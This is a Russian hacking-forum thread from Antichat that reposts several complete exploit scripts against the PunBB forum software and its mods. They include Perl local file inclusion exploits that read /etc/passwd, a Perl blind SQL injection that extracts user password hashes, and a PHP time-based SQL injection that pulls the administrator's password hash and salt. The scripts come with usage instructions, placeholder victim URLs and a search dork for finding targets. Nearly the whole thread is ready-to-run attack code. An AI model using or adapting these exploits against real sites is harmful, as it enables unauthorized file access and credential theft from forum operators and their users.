Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
20.11.2008, 23:41
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
PHP код:
#!/usr/bin/perl
=about
PunBB (PunPortal 0.1) Local File Inclusion Exploit
--------------------------------------------------
by athos - staker[at]hotmail[dot]it
download mod http://www.punres.org/download.php?id=1108
download cms http://punbb.org
register globals = 1
magic quotes gcp = 1
File (include/login.php)
1. <?php
2.
3. // Show login if not logged in
4. if($pun_user['is_guest'])
5. {
6. if(!isset($focus_element) || (isset($focus_element) && !in_array('login', $focus_element)))
7. {
8.
9. // Load the language files
10. require PUN_ROOT.'lang/'.$pun_user['language'].'/common.php';
11. require PUN_ROOT.'lang/'.$pun_user['language'].'/login.php';
$pun_user['is_guest'] isn't declared
$pun_user['language'] isn't declared
include/user/login.php?pun_user[is_guest]=a&pun_user[language]=../../etc/passwd%00
how to fix?use the latest version (2.0)
Usage: perl punbb.pl localhost/cms
=cut
use strict;
use warnings;
use IO::Socket;
my $html = undef;
my $site = $ARGV[0] or &help;
my @take = split /\//,$site;
my ($host,$path) = @take;
if($site =~ /http:\/\/(.+?)/i) {
print STDOUT "Invalid URL\n";
exit;
}
print STDOUT "Local File (ex: ../../etc/passwd)\n";
print STDOUT "Local File: ";
chomp(my $file = <STDIN>);
if(not defined($file)) {
print STDOUT "File Not Defined!\n";
exit;
}
my $evil = "/include/user/login.php?pun_user[is_guest]=a&pun_user[language]=";
my $sock = new IO::Socket::INET(
PeerAddr => $host,
PeerPort => 80,
Proto => 'tcp',
Timeout => 6,
) or die $!;
my $data = "GET /${path}/${evil}${file}%00 HTTP/1.1\r\n".
"Host: $host\r\n".
"User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n".
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n".
"Accept-Language: en-us,en;q=0.5\r\n".
"Accept-Encoding: gzip,deflate\r\n".
"Connection: close\r\n\r\n";
$sock->send($data);
while(<$sock>) {
$html .= $_;
}
if($html =~ /(No such file or directory|HTTP\/1.1 404 Not Found)/i) {
print STDOUT "Exploit Failed!\n";
exit;
}
else {
my $name = int(rand(999)).'.txt';
open(FILE,">",$name);
print FILE $html;
close(FILE);
print STDOUT "Exploit Successfully!\n";
print STDOUT "$name saved!\n";
exit;
}
sub help {
print STDOUT "PunBB (PunPortal 0.1) Local File Inclusion Exploit\n".
"by athos - staker[at]hotmail[dot]it\n".
"Usage: perl $0 [host/path]\n";
exit;
}
http://www.milw0rm.com/exploits/7168 (с) |
|
|
PunBB Reputation.php Mod <= v2.0.4 Remote Blind SQL Injection Exploit |
28.07.2009, 23:07
|
|
Moderator - Level 7
Регистрация: 28.04.2007
Сообщений: 547
Провел на форуме:
5516499
Репутация:
3702
|
|
PunBB Reputation.php Mod <= v2.0.4 Remote Blind SQL Injection Exploit
PunBB Reputation.php Mod <= v2.0.4 Remote Blind SQL Injection Exploit
Код:
#!/usr/bin/perl
#[0-Day] PunBB Reputation.php Mod <= v2.0.4 Remote Blind SQL Injection Exploit
#Coded By Dante90, WaRWolFz Crew
#Bug Discovered By: Dante90, WaRWolFz Crew
use strict;
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common;
use Time::HiRes;
use IO::Socket;
my ($UserName,$PassWord,$ID) = @ARGV;
if(@ARGV < 3){
&usage();
exit();
}
my $Message = "";
my ($Hash,$Time,$Time_Start,$Time_End,$Response);
my($Start,$End);
my @chars = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
my $Host = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link
my $Method = HTTP::Request->new(POST => $Host);
my $Cookies = new HTTP::Cookies;
my $HTTP = new LWP::UserAgent(
agent => 'Mozilla/5.0',
max_redirect => 0,
cookie_jar => $Cookies,
) or die $!;
my $Referrer = "form_sent=1&pid=10174&poster=Dante90, WaRWolFz Crew&method=1&req_message=http://www.warwolfz.com/&submit=Invia";
my $DefaultTime = request($Referrer);
sub Login(){
my $Login = $HTTP->post($Host.'login.php?action=in',
[
form_sent => '1',
redirect_url => 'forums.php',
req_username => $UserName,
req_password => $PassWord,
login => 'Login',
]) || die $!;
if($Login->content =~ /Logged in successfully./i){
return 1;
}else{
return 0;
}
}
if (Login() == 1){
$Message = " * Logged in as: ".$UserName;
}elsif (Login() == 0){
$Message = " * Login Failed.";
refresh($Message, $Host, $DefaultTime, "0", $Hash, $Time, "1");
print " * Exploit Failed *\n";
print " ------------------------------------------------------ \n";
exit;
}
sub Blind_SQL_Jnjection{
my ($dec,$hex) = @_;
return "Dante90, WaRWolFz Crew\" OR ASCII(SUBSTRING((SELECT `password` FROM `users` WHERE `id`=${ID}),${dec},1))=${hex}/*";
}
for(my $I=1; $I<=40; $I++){ #N Hash characters
for(my $J=0; $J<=15; $J++){ #0 -> F
my $Post = $HTTP->post($Host.'reputation.php?',[
form_sent => '1',
pid => '2',
poster => Blind_SQL_Jnjection($I,$chars[$J]),
method => '1',
req_message => 'http://www.warwolfz.com/',
submit => 'Submit',
]) || die $!;
$Time = request($Referrer);
refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I);
if($Post->content =~ /(The reputation has been successfully changed)/i){
syswrite(STDOUT,chr($chars[$J]));
$Hash .= chr($chars[$J]);
$Time = request($Referrer);
refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I);
last;
}
}
if($I == 1 && length $Hash < 1 && !$Hash){
print " * Exploit Failed *\n";
print " ------------------------------------------------------ \n";
exit;
}
if($I == 40){
print " * Exploit Successed *\n";
print " ------------------------------------------------------\n ";
system("pause");
}
}
sub usage{
system("cls");
{
print " \n [0-Day] PunBB Reputation.php Mod <= v2.0.4 Remote Blind SQL Injection Exploit\n";
print " ------------------------------------------------------ \n";
print " * USAGE: *\n";
print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n";
print " * perl name_exploit.pl [username] [password] [id] *\n";
print " ------------------------------------------------------ \n";
print " * Powered By Dante90, WaRWolFz Crew *\n";
print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
print " ------------------------------------------------------ \n";
};
exit;
}
sub request{
$Referrer = $_[0];
$Method->content_type('application/x-www-form-urlencoded');
$Method->content($Referrer);
$Start = Time::HiRes::time();
$Response = $HTTP->request($Method);
$Response->is_success() or die "$Host : ", $Response->message,"\n";
$End = Time::HiRes::time();
$Time = $End - $Start;
return $Time;
}
sub refresh{
system("cls");
{
print " \n [0-Day] PunBB Reputation.php Mod <= v2.0.4 Remote Blind SQL Injection Exploit\n";
print " ------------------------------------------------------ \n";
print " * USAGE: *\n";
print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n";
print " * perl name_exploit.pl [username] [password] [id] *\n";
print " ------------------------------------------------------ \n";
print " * Powered By Dante90, WaRWolFz Crew *\n";
print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
print " ------------------------------------------------------ \n";
};
print $_[0] ."\n";
print " * Victime Site: " . $_[1] . "\n";
print " * Default Time: " . $_[2] . " seconds\n";
print " * BruteForcing Hash: " . chr($chars[$_[3]]) . "\n";
print " * BruteForcing N Char Hash: " . $_[6] . "\n";
print " * SQL Time: " . $_[5] . " seconds\n";
print " * Hash: " . $_[4] . "\n";
}
#WaRWolFz Crew
# milw0rm.com [2009-07-28]
|
|
|
|
PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit |
31.07.2009, 10:25
|
|
Moderator - Level 7
Регистрация: 28.04.2007
Сообщений: 547
Провел на форуме:
5516499
Репутация:
3702
|
|
PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit
PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit
Код:
#!/usr/bin/perl
#[0-Day] PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit
#Coded By Dante90, WaRWolFz Crew
#Bug Discovered By: Dante90, WaRWolFz Crew
#register_globals = On
#magic_quotes_gpc = On
use LWP::UserAgent;
use HTTP::Cookies;
use strict;
my $EtcPasswd;
my $TransversalDirectory = "./../../../../"; #Transversal Directory
my $LFI = "etc/passwd"; #File Inject
my $HostName = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link
my $Referrer = "http://www.warwolfz.com/";
my $Cookies = new HTTP::Cookies;
my $UserAgent = new LWP::UserAgent(
agent => 'Mozilla/5.0',
max_redirect => 0,
cookie_jar => $Cookies,
) or die $!;
sub Local_File_Inclusion{
my ($Directory,$Command) = @_;
return "./include/reputation/rep_profile.php?pun_user[language]=${Directory}${Command}%00";
}
my $Get = $UserAgent->get($HostName.Local_File_Inclusion($TransversalDirectory,$LFI));
if ($Get->content =~ /No such file or directory in/i){
refresh($HostName, "Exploit Filed");
print " * Error extracting sensible data.\n";
print " * Exploit Failed *\n";
print " ------------------------------------------------------ \n\n";
}else{
$EtcPasswd = $Get->content;
open ( FILE , ">WaRWolFz.html" ) or die $!;
print FILE $EtcPasswd;
close ( FILE );
refresh($HostName, "File Saved");
print " * Exploit Successed *\n";
print " ------------------------------------------------------\n\n";
system("pause");
}
sub usage{
system("cls");
{
print " \n [0-Day] PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit\n";
print " ------------------------------------------------------ \n";
print " * USAGE: *\n";
print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n";
print " * perl name_exploit.pl *\n";
print " ------------------------------------------------------ \n";
print " * Powered By Dante90, WaRWolFz Crew *\n";
print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
print " ------------------------------------------------------ \n";
};
exit;
}
sub refresh{
system("cls");
{
print " \n [0-Day] PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit\n";
print " ------------------------------------------------------ \n";
print " * USAGE: *\n";
print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n";
print " * perl name_exploit.pl *\n";
print " ------------------------------------------------------ \n";
print " * Powered By Dante90, WaRWolFz Crew *\n";
print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
print " ------------------------------------------------------ \n";
};
print " * Victime Site: " . $_[0] . "\n";
print " * Etc/Passwd: " . $_[1] . "\n";
}
#WaRWolFz
# milw0rm.com [2009-07-30]
|
|
|
|
13.11.2009, 15:16
|
|
Познающий
Регистрация: 29.03.2009
Сообщений: 87
Провел на форуме:
2185909
Репутация:
308
|
|
Punbb Extension Attachment <= v1.0.2 Bind SQL injection exploit
Код:
f (isset($_GET['secure_str']))
{
if (preg_match('~(\d+)f(\d+)~', $_GET['secure_str'], $match))
{
...
'WHERE' => 'a.id = '.$attach_item.' AND (fp.read_forum IS NULL OR fp.read_forum = 1)
Злоупотребление preg_match 
Код:
#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
Punbb Extension Attachment <= v1.0.2 Bind SQL injection exploit
by puret_t
mail: puretot at gmail dot com
team: http://www.wolvez.org
dork: "Powered by PunBB"
+---------------------------------------------------------------------------+
');
/**
* works regardless of php.ini settings
*/
if ($argc < 3) {
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to punbb
Example:
php '.$argv[0].' localhost /punbb/
+---------------------------------------------------------------------------+
');
exit;
}
error_reporting(7);
ini_set('max_execution_time', 0);
$host = $argv[1];
$path = $argv[2];
$pre = 'pun_';
$benchmark = 200000000;
$timeout = 10;
echo "Plz Waiting...\nPassword:\n";
/**
* get pass
*/
$j = 1;
$pass = '';
$hash[0] = 0; //null
$hash = array_merge($hash, range(48, 57)); //numbers
$hash = array_merge($hash, range(97, 122)); //az letters
while (strlen($pass) < 40) {
for ($i = 0; $i <= 255; $i ++) {
if (in_array($i, $hash)) {
$cmd = '1f1%27%20AND%20(IF((ASCII(SUBSTRING((SELECT%20password%20FROM%20'.$pre.'users%20WHERE%20group_id=1%20LIMIT%201),'.$j.',1))='.$i.'),BENCHMARK('.$benchmark.',CHAR(0)),1))%23';
send();
usleep(2000000);
$starttime = time();
send();
$endtime = time();
$difftime = $endtime - $starttime;
if ($difftime > $timeout) {
$pass .= chr($i);
echo chr($i);
break;
}
}
if ($i == 255)
exit("\nExploit Failed!\n");
}
$j ++;
}
echo "\nSalt:\n";
/**
* get salt
*/
$j = 1;
$salt = '';
$hash[0] = 0; //null
$hash = array_merge($hash, range(33, 126));
while (strlen($salt) < 12) {
for ($i = 0; $i <= 255; $i ++) {
if (in_array($i, $hash)) {
$cmd = '1f1%27%20AND%20(IF((ASCII(SUBSTRING((SELECT%20salt%20FROM%20'.$pre.'users%20WHERE%20group_id=1%20LIMIT%201),'.$j.',1))='.$i.'),BENCHMARK('.$benchmark.',CHAR(0)),1))%23';
send();
usleep(2000000);
$starttime = time();
send();
$endtime = time();
$difftime = $endtime - $starttime;
if ($difftime > $timeout) {
$salt .= chr($i);
echo chr($i);
break;
}
}
if ($i == 255)
exit("\nExploit Failed!\n");
}
$j ++;
}
exit("\nExpoilt Success!\nPassword Hash:\t$pass\nSalt:\t$salt\n");
function send()
{
global $host, $path, $cmd;
$data = "GET ".$path."misc.php?item=1&secure_str=".$cmd." HTTP/1.1\r\n";
$data .= "Host: $host\r\n";
$data .= "Connection: Close\r\n\r\n";
$fp = fsockopen($host, 80);
fputs($fp, $data);
$resp = '';
while ($fp && !feof($fp))
$resp .= fread($fp, 1024);
return $resp;
}
?>
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [underwater]](/avatars/avatar81148.gif){kind=avatar}
Похожие темы
Линейный вид
